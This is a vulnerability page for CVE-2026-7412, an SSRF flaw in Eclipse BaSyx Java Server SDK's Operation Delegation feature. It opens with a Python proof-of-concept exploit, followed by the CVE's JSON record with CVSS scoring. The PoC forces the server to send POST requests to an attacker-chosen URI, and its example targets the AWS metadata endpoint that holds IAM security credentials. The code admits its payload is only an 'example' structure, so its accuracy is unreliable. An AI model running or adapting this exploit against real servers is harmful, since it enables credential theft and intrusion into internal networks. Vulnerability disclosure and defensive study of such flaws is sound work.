CVE-2026-7412

import requests # CVE-2026-7412 PoC Generator # Target: Eclipse BaSyx Java Server SDK < 2.0.0-milestone-10 # Description: Exploits the Operation Delegation feature to force a blind HTTP POST to an arbitrary URI. def exploit_ssrf(target_url, malicious_uri): """ Sends a malicious request to the vulnerable BaSyx server to force a POST request to the malicious_uri. """ # Example payload structure based on Operation Delegation payload = { "operation": "delegate", "destination": malicious_uri, "method": "POST" } try: print(f"[*] Sending SSRF payload to {target_url}") print(f"[*] Forcing server to POST to: {malicious_uri}") response = requests.post(target_url, json=payload, timeout=5) if response.status_code == 200: print("[+] Request sent successfully. Check if the internal server received the request.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Example: Attacker tries to hit the AWS IMDSv1 (if not protected) or an internal admin panel target = "http://vulnerable-basyx-server:8080/api/operation" internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" exploit_ssrf(target, internal_target)

{"cve": {"id": "CVE-2026-7412", "sourceIdentifier": "[email protected]", "published": "2026-05-05T16:16:18.480", "lastModified": "2026-05-06T16:16:12.510", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, the Operation Delegation feature fails to validate the destination URI of delegated requests. An unauthenticated remote attacker can exploit this design flaw to force the BaSyx server to execute blind HTTP POST requests to arbitrary internal or external targets. This allows an attacker to bypass network segmentation and pivot into isolated internal IT/OT infrastructure or target Cloud Metadata services (IMDS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/103", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "[email protected]"}, {"url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}